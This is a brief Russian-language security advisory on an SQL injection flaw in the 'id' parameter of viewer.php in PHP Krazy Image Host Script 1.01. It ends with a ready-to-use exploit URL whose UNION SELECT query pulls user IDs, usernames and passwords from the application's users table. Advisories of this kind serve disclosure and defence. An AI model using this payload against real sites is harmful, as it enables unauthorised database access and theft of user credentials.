Программа: PHP Krazy Image Host Script 1.01

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «id» сценарием viewer.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://victim.it/viewer.php?id=-1 union select
0,0,0,concat(id,char(45),user,char(45),password),0,0, from users—



Оставить мнение